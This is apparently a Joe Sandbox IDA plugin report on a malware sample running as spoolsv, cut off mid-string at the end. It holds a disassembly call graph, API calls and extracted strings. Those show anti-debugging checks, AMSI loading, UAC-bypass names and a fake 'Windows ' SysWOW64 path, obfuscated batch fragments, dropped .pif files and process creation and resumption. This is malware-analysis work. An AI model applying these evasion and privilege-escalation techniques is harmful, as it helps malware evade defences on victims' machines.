call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2280->2284 2281->2280 2319 2b41dd2-2b41dd9 call 2b38824 2284->2319 2325 2b41dde-2b41e49 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2319->2325 2361 2b41e4e-2b41e55 call 2b38824 2325->2361 2367 2b41e5a-2b41ee5 call 2b3eb3c call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2361->2367 2426 2b41eea-2b41ef1 call 2b38824 2367->2426 2905 2b43a67-2b43aa8 call 2b24d8c * 2 call 2b24734 call 2b3dacc 2378->2905 2906 2b43aad-2b43c74 call 2b3870c call 2b3e540 call 2b24798 call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b27e18 2378->2906 2379->2378 2432 2b41ef6-2b41f61 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2426->2432 2468 2b41f66-2b41f6d call 2b38824 2432->2468 2468->1661 2660->2661 2686 2b4551b-2b45c31 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24d8c * 2 call 2b24734 call 2b3dacc 2660->2686 2880 2b47a68-2b47c67 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24898 2661->2880 2881 2b46f39-2b4758b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24798 call 2b2494c call 2b38410 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2494c call 2b246a4 call 2b3ac38 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b236a0 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 2661->2881 3580 2b45c36-2b45e35 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24898 2686->3580 3123 2b48af1-2b48c74 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24898 2880->3123 3124 2b47c6d-2b47e40 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24798 call 2b2494c call 2b24d20 call 2b24d9c CreateProcessAsUserW 2880->3124 3848 2b47592-2b47854 call 2b35a74 call 2b24b78 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b249a4 call 2b37dd8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3af58 2881->3848 3849 2b4758d-2b47590 2881->3849 2905->2906 3142 2b43c76-2b43ccc call 2b3e198 call 2b24d8c call 2b24734 call 2b24d8c call 2b3dacc 2906->3142 3143 2b43cd1-2b440ff call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b3e540 call 2b24798 call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27e18 2906->3143 3359 2b49420-2b4aa25 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 * 16 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b37b98 call 2b3818c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 ExitProcess 3123->3359 3360 2b48c7a-2b48c89 call 2b24898 3123->3360 3398 2b47e42-2b47eb9 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 3124->3398 3399 2b47ebe-2b47fc9 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 3124->3399 3142->3143 3877 2b44147-2b44590 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b27e18 3143->3877 3878 2b44101-2b44142 call 2b24d8c * 2 call 2b24734 call 2b3dacc 3143->3878 3360->3359 3378 2b48c8f-2b48f62 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e540 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27e18 3360->3378 3880 2b48f68-2b49215 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24d8c * 2 call 2b24734 call 2b3dacc 3378->3880 3881 2b4921a-2b4941b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b249a4 call 2b38bb0 3378->3881 3398->3399 3585 2b47fd0-2b482f0 call 2b249a4 call 2b3dc90 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3cfa4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 3399->3585 3586 2b47fcb-2b47fce 3399->3586 3951 2b46099-2b467bc call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b236a0 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b22f08 call 2b2794c call 2b24798 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b22f08 call 2b2794c call 2b24798 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b236d0 3580->3951 3952 2b45e3b-2b46094 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b24d20 call 2b24d8c call 2b24734 call 2b3dacc 3580->3952 4214 2b482f2-2b48304 call 2b38584 3585->4214 4215 2b48309-2b48aec call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 ResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b37ed4 call 2b387a0 * 6 CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 3585->4215 3586->3585 4488 2b47859-2b47870 call 2b236d0 3848->4488 3849->3848 4676 2b44592-2b445e8 call 2b3e198 call 2b24d8c call 2b24734 call 2b24d8c call 2b3dacc 3877->4676 4677 2b445ed-2b44846 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b27e18 3877->4677 3878->3877 3880->3881 3881->3359 3952->3951 4214->4215 4215->3123 4676->4677 4958 2b448a3-2b44c73 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b2494c call 2b38410 Sleep call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24d20 call 2b3da44 call 2b24d20 call 2b3da44 call 2b2480c call 2b2494c * 2 MoveFileA call 2b2480c call 2b2494c * 2 MoveFileA call 2b2494c call 2b24d20 call 2b3da44 call 2b2494c call 2b24d20 call 2b3da44 call 2b2494c call 2b24d20 call 2b3da44 4677->4958 4959 2b44848-2b4489e call 2b3e198 call 2b24d8c call 2b24734 call 2b24d8c call 2b3dacc 4677->4959 4958->2014 4959->4958
                                                                              APIs
                                                                              • InetIsOffline.URL(00000000,00000000,02B4AFA1,?,?,?,000002F7,00000000,00000000), ref: 02B3ECAE
                                                                                • Part of subcall function 02B38824: LoadLibraryA.KERNEL32(00000000,00000000,02B3890B), ref: 02B38858
                                                                                • Part of subcall function 02B38824: FreeLibrary.KERNEL32(74D80000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,05F5E0FF,00000040,02B8139C,74D80000,00000000,00000000,00000000,00000000,02B3890B), ref: 02B388EB
                                                                                • Part of subcall function 02B3EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF98,UacInitialize,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanBuffer,02B8137C,02B4AFD8,ScanString,02B8137C,02B4AFD8,Initialize), ref: 02B3EB9A
                                                                                • Part of subcall function 02B3EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBAC
                                                                                • Part of subcall function 02B3EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EC00
                                                                                • Part of subcall function 02B3EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC12
                                                                                • Part of subcall function 02B3EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC29
                                                                                • Part of subcall function 02B27E18: GetFileAttributesA.KERNEL32(00000000,?,02B3F8CC,ScanString,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanString,02B8137C,02B4AFD8,UacScan,02B8137C,02B4AFD8,UacInitialize), ref: 02B27E23
                                                                                • Part of subcall function 02B2C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C758C8,?,02B3FBFE,ScanBuffer,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanBuffer,02B8137C,02B4AFD8,OpenSession), ref: 02B2C303
                                                                                • Part of subcall function 02B3DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DC80), ref: 02B3DBEB
                                                                                • Part of subcall function 02B3DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC80), ref: 02B3DC1B
                                                                                • Part of subcall function 02B3DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC30
                                                                                • Part of subcall function 02B3DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC5C
                                                                                • Part of subcall function 02B3DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC65
                                                                                • Part of subcall function 02B27E3C: GetFileAttributesA.KERNEL32(00000000,?,02B42A49,ScanString,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanBuffer,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,Initialize), ref: 02B27E47
                                                                                • Part of subcall function 02B27FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B42BE7,OpenSession,02B8137C,02B4AFD8,ScanString,02B8137C,02B4AFD8,Initialize,02B8137C,02B4AFD8,ScanString,02B8137C,02B4AFD8), ref: 02B27FDD
                                                                                • Part of subcall function 02B3DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DB9E), ref: 02B3DB0B
                                                                                • Part of subcall function 02B3DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB45
                                                                                • Part of subcall function 02B3DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB72
                                                                                • Part of subcall function 02B3DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB7B
                                                                                • Part of subcall function 02B387A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B813A4,02B3A3C7,ScanString,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,Initialize,02B813A4,02B3A77C,UacScan), ref: 02B387B4
                                                                                • Part of subcall function 02B387A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387CE
                                                                                • Part of subcall function 02B387A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B813A4,02B3A3C7,ScanString,02B813A4,02B3A77C,ScanBuffer,02B813A4,02B3A77C,Initialize), ref: 02B3880A
                                                                                • Part of subcall function 02B3870C: LoadLibraryW.KERNEL32(amsi), ref: 02B38715
                                                                                • Part of subcall function 02B3870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B38774
                                                                              • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanBuffer,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,02B4B330), ref: 02B449B7
                                                                                • Part of subcall function 02B3DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA6C
                                                                                • Part of subcall function 02B3DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DABE), ref: 02B3DA82
                                                                                • Part of subcall function 02B3DA44: NtDeleteFile.NTDLL(?), ref: 02B3DAA1
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44BB7
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44C0D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                              • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows 